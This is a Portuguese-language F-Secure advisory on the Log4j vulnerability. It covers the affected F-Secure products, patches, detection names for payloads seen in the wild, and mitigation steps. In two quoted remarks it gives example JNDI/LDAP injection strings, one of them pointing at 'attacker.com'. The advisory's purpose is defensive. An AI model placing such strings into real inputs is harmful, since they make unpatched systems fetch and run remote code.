Uma vulnerabilidade na biblioteca Log4J, descoberta na sexta-feira, 10 de dezembro, está abalando fabricantes de software e provedores de serviços em todo o mundo. A vulnerabilidade no método padronizado de processamento de mensagens de log em software do Minecraft da Microsoft para plataformas de comércio eletrônico já está sendo atacada por invasores.
É quase impossível descrever o nível de risco que os aplicativos vulneráveis representam atualmente. Se uma sequência de caracteres controlada pelo usuário destinada à vulnerabilidade for registrada, a vulnerabilidade poderá ser executada remotamente. Simplificando, um invasor pode usar essa vulnerabilidade para induzir o sistema de destino a buscar e executar código de um local remoto. Na segunda etapa, cabe ao invasor decidir o que o código malicioso deve fazer.
Uma “tempestade quase perfeita”
Essa vulnerabilidade mostra como é difícil proteger o software corporativo em vários níveis. Software desatualizado, incluindo versões mais antigas do Java, obriga muitas empresas a desenvolver seus próprios patches ou impedi-los de corrigi-los imediatamente. Outra complicação surge do desafio de corrigir os recursos de log do Log4j em tempo real, exatamente quando a ameaça de ataques é tão alta e o log é tão importante.
Todas as contramedidas recomendadas devem ser implementadas “imediatamente”, escreve a Cybersecurity & Infrastructure Security Agency em um blog.
Não há muito que os usuários individuais possam fazer além de instalar atualizações para vários serviços online à medida que se tornam disponíveis. E isso deve acontecer imediatamente. Empresas e empresas trabalharão sem parar para implantar patches enquanto protegem seus próprios sistemas. Depois disso, será importante determinar se um incidente de segurança ativo está em andamento nos sistemas afetados.
Vulnerabilidades em quase todos os lugares
Pode ser mais difícil encontrar um aplicativo que não use a Biblioteca Log4J do que um que use. Essa onipresença significa que os invasores podem procurar vulnerabilidades em quase qualquer lugar.
“Mude o nome do seu Tesla ou iPhone NÃO em ${jndi:ldap://url/a}, a menos que você queira um evento inesperado”, diz Erka Koivunen, Chief Information Security Officer da F-Secure, brincando.
O uso da linguagem de formatação do Log4J pode desencadear malware em aplicativos vulneráveis. Como sabemos, apenas a menção de uma frase como ${jndi:ldap://attacker.com/pwnyourserver} em um bate-papo do Minecraft, por exemplo, pode desencadear uma tempestade de segurança na Microsoft em um sistema não corrigido.
Os produtos F-Secure são afetados?
A F-Secure determinou que os seguintes produtos são afetados por esta vulnerabilidade:
- Gerenciador de políticas da F-Secure
- Proxy do F-Secure Policy Manager
- Proxy de endpoint F-Secure
- Conector F-Secure Elements
As versões Windows e Linux desses produtos são afetadas e devem ser corrigidas imediatamente.
Como posso corrigir meu produto F-Secure?
Desenvolvemos um patch de segurança para esta vulnerabilidade. Notícias e atualizações sobre esta vulnerabilidade são publicadas continuamente em nossa página da comunidade
Que proteção a F-Secure oferece contra essa vulnerabilidade?
O F-Secure Endpoint Protection (EPP) é constantemente atualizado com detecções para os arquivos de exploração locais mais recentes, mas, considerando as várias maneiras pelas quais uma vulnerabilidade pode ser explorada, isso cobre apenas parte do problema.
As detecções de EPP, como de costume, lidam com qualquer carga útil observada na fase de pós-exploração. No momento em que este livro foi escrito, a F-Secure fez as seguintes detecções que abrangem alguns cenários de ataque sérios. Essas são cargas maliciosas que observamos em conexão com as explorações do Log4j.
- TR/Drop.Cobacis.AL
- TR/Rozena.wrdej
- TR/PShell.Agente.SWR
- TR/Coblat.G1
- TR/AD.MeterpreterSC.rywng
Muitas dessas detecções estão disponíveis no F-Secure EPP há meses, o que significa que os clientes estão protegidos proativamente contra essas cargas úteis.
Outras detecções existentes também podem ser úteis, pois há várias maneiras de aproveitar a exploração. Esta lista de detecções úteis será continuamente atualizada à medida que a situação evoluir. Consulte as recomendações gerais na seção a seguir para obter ações corretivas adicionais.
Em geral, quais ações você deve tomar com qualquer software, independentemente do fabricante?
- Restrinja o acesso à rede ou limite-o a sites confiáveis. Se o seu sistema não conseguir se conectar à Internet para obter o código malicioso, o ataque falhará.
- Verifique regularmente com os fornecedores informações sobre patches e outras correções para vulnerabilidades de segurança.
- O F-Secure Elements Vulnerability Management pode ajudar a identificar sistemas vulneráveis.
- Os produtos F-Secure Elements Endpoint Protection ou F-Secure Business Suite podem detectar e corrigir o software vulnerável no sistema em que estão instalados.
A F-Secure também mantém todos os clientes e usuários atualizados o tempo todo.
Mais em F-Secure.com
Sobre a F-Secure Ninguém tem uma visão melhor sobre ataques cibernéticos reais do que a F-Secure. Nós preenchemos a lacuna entre a detecção e a resposta. Para fazer isso, aproveitamos a experiência inigualável em ameaças de centenas dos principais consultores técnicos do setor, dados de milhões de dispositivos que executam nosso software premiado e inovações contínuas em inteligência artificial. Os principais bancos, companhias aéreas e corporações confiam em nosso compromisso de combater as ameaças cibernéticas mais perigosas do mundo. Juntamente com nossa rede dos principais parceiros de canal e mais de 200 provedores de serviços, nossa missão é fornecer a todos os nossos clientes segurança cibernética de nível empresarial adaptada às suas necessidades. Fundada em 1988, a F-Secure está listada na NASDAQ OMX Helsinki Ltd.